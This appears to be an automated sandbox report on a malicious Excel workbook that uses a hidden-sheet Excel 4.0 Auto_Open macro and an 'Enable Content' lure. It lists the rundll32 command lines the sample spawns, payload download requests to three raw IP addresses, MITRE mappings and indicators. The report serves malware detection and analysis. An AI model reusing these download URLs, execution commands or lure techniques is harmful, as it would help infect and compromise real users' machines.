Loading ...

Play interactive tourEdit tour

Analysis Report a5c5a139_by_Libranalysis

Overview

General Information

Sample Name:a5c5a139_by_Libranalysis (renamed file extension from none to xlsx)
Analysis ID:414449
MD5:a5c5a139b458c718527f59afe34a759a
SHA1:a2743d88245ac25263afffd7f4dcbd0fe53e0bdf
SHA256:16383e719fa9ff39d7d4dac2631fa8bfe0a6f63d5130c33053bc0db5e5aa1f89
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Obfuscated Macro In XLSM
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2516 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2452 cmdline: rundll32 ..\lertio.cersw,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2472 cmdline: rundll32 ..\lertio.cersw1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 3068 cmdline: rundll32 ..\lertio.cersw2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sheet1.xmlJoeSecurity_ObfuscatedMacroInXLSMYara detected Obfuscated Macro In XLSMJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\lertio.cersw,DllRegisterServer, CommandLine: rundll32 ..\lertio.cersw,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2516, ProcessCommandLine: rundll32 ..\lertio.cersw,DllRegisterServer, ProcessId: 2452

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.90.57.62:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.90.57.62:80
    Source: global trafficHTTP traffic detected: GET /44330.7644571759.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.90.57.62Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44330.7644571759.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.198.57.83Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44330.7644571759.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 194.156.98.173Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.62
    Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.62
    Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.62
    Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.62
    Source: unknownTCP traffic detected without corresponding DNS query: 185.198.57.83
    Source: unknownTCP traffic detected without corresponding DNS query: 185.198.57.83
    Source: unknownTCP traffic detected without corresponding DNS query: 185.198.57.83
    Source: unknownTCP traffic detected without corresponding DNS query: 185.198.57.83
    Source: unknownTCP traffic detected without corresponding DNS query: 194.156.98.173
    Source: unknownTCP traffic detected without corresponding DNS query: 194.156.98.173
    Source: unknownTCP traffic detected without corresponding DNS query: 194.156.98.173
    Source: unknownTCP traffic detected without corresponding DNS query: 194.156.98.173
    Source: unknownTCP traffic detected without corresponding DNS query: 194.156.98.173
    Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.62
    Source: unknownTCP traffic detected without corresponding DNS query: 185.198.57.83
    Source: unknownTCP traffic detected without corresponding DNS query: 194.156.98.173
    Source: unknownTCP traffic detected without corresponding DNS query: 194.156.98.173
    Source: unknownTCP traffic detected without corresponding DNS query: 185.198.57.83
    Source: unknownTCP traffic detected without corresponding DNS query: 45.90.57.62
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD3D6ABC.jpgJump to behavior
    Source: global trafficHTTP traffic detected: GET /44330.7644571759.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.90.57.62Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44330.7644571759.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.198.57.83Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44330.7644571759.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 194.156.98.173Connection: Keep-Alive
    Source: rundll32.exe, 00000003.00000002.2137860638.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2131820122.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125751466.0000000001B10000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: rundll32.exe, 00000003.00000002.2137860638.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2131820122.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125751466.0000000001B10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2137860638.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2131820122.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125751466.0000000001B10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2138066010.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2132039751.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125921530.0000000001CF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2138066010.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2132039751.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125921530.0000000001CF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: rundll32.exe, 00000003.00000002.2138066010.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2132039751.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125921530.0000000001CF7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2138066010.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2132039751.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125921530.0000000001CF7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000003.00000002.2137860638.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2131820122.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125751466.0000000001B10000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2138066010.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2132039751.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125921530.0000000001CF7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2137860638.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2131820122.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125751466.0000000001B10000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000006.00000002.2125751466.0000000001B10000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
    Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
    Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
    Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
    Source: Screenshot number: 8Screenshot OCR: Enable editing button from th Thespecified module could not befound. Once you have enabled editin
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: a5c5a139_by_Libranalysis.xlsxInitial sample: EXEC
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22730"/><workbookPr codeName="pallet"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="E:\Nowiy\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{B3E8A19E-5A5C-41C9-AA3C-CB4D56C02DF8}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15990" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="8" r:id="rId1"/><sheet name="Sheet1" sheetId="3" state="hidden" r:id="rId2"/><sheet name="Sheet2" sheetId="22" state="hidden" r:id="rId3"/><sheet name="Sheet3" sheetId="30" state="hidden" r:id="rId4"/><sheet name="Sheet4" sheetId="29" state="hidden" r:id="rId5"/><sheet name="Sheet000" sheetId="26" state="hidden" r:id="rId6"/><sheet name="Sheet2323" sheetId="27" state="hidden" r:id="rId7"/></sheets><definedNames><definedName name="Hot">Sheet1!$F$5</definedName><definedName name="_xlnm.Auto_Open">Sheet2323!$A$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
    Source: rundll32.exe, 00000003.00000002.2137860638.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2131820122.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125751466.0000000001B10000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal72.expl.evad.winXLSX@7/8@0/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$a5c5a139_by_Libranalysis.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE33D.tmpJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\lertio.cersw,DllRegisterServer
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\lertio.cersw,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\lertio.cersw1,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\lertio.cersw2,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\lertio.cersw,DllRegisterServerJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\lertio.cersw1,DllRegisterServerJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\lertio.cersw2,DllRegisterServerJump to behavior
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: a5c5a139_by_Libranalysis.xlsxInitial sample: OLE zip file path = xl/media/image1.jpg
    Source: a5c5a139_by_Libranalysis.xlsxInitial sample: OLE zip file path = xl/calcChain.xml
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Data Obfuscation:

    barindex
    Yara detected Obfuscated Macro In XLSMShow sources
    Source: Yara matchFile source: sheet1.xml, type: SAMPLE
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    a5c5a139_by_Libranalysis.xlsx0%ReversingLabs

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://45.90.57.62/44330.7644571759.dat0%Avira URL Cloudsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://194.156.98.173/44330.7644571759.dat0%Avira URL Cloudsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://185.198.57.83/44330.7644571759.dat0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://45.90.57.62/44330.7644571759.datfalse
    • Avira URL Cloud: safe
    unknown
    http://194.156.98.173/44330.7644571759.datfalse
    • Avira URL Cloud: safe
    unknown
    http://185.198.57.83/44330.7644571759.datfalse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2138066010.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2132039751.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125921530.0000000001CF7000.00000002.00000001.sdmpfalse
      high
      http://www.windows.com/pctv.rundll32.exe, 00000006.00000002.2125751466.0000000001B10000.00000002.00000001.sdmpfalse
        high
        http://investor.msn.comrundll32.exe, 00000003.00000002.2137860638.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2131820122.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125751466.0000000001B10000.00000002.00000001.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2137860638.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2131820122.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125751466.0000000001B10000.00000002.00000001.sdmpfalse
            high
            http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2138066010.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2132039751.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125921530.0000000001CF7000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2138066010.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2132039751.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125921530.0000000001CF7000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2137860638.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2131820122.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125751466.0000000001B10000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.com/rundll32.exe, 00000003.00000002.2137860638.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2131820122.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2125751466.0000000001B10000.00000002.00000001.sdmpfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                185.198.57.83
                unknownNetherlands
                60117HSAEfalse
                45.90.57.62
                unknownBulgaria
                204957GREENFLOID-ASUAfalse
                194.156.98.173
                unknownRussian Federation
                135330ADCDATACOM-AS-APADCDATACOMHKfalse

                General Information

                Joe Sandbox Version:32.0.0 Black Diamond
                Analysis ID:414449
                Start date:14.05.2021
                Start time:18:19:44
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 6m 6s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:a5c5a139_by_Libranalysis (renamed file extension from none to xlsx)
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal72.expl.evad.winXLSX@7/8@0/3
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Scroll down
                • Close Viewer

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                185.198.57.83de2e6c2a_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 185.198.57.83/44330.7472140046.dat
                de2e6c2a_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 185.198.57.83/44330.7422190972.dat
                45.90.57.62de2e6c2a_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 45.90.57.62/44330.7472140046.dat
                de2e6c2a_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 45.90.57.62/44330.7422190972.dat
                194.156.98.173de2e6c2a_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 194.156.98.173/44330.7472140046.dat
                de2e6c2a_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 194.156.98.173/44330.7422190972.dat

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                HSAEde2e6c2a_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 185.198.57.83
                de2e6c2a_by_Libranalysis.xlsxGet hashmaliciousBrowse
                • 185.198.57.83
                OHTwo9pVp7.xlsxGet hashmaliciousBrowse
                • 185.183.96.233
                OHTwo9pVp7.xlsxGet hashmaliciousBrowse
                • 185.183.96.233
                0pHHclhVsj.exeGet hashmaliciousBrowse
                • 185.117.73.222
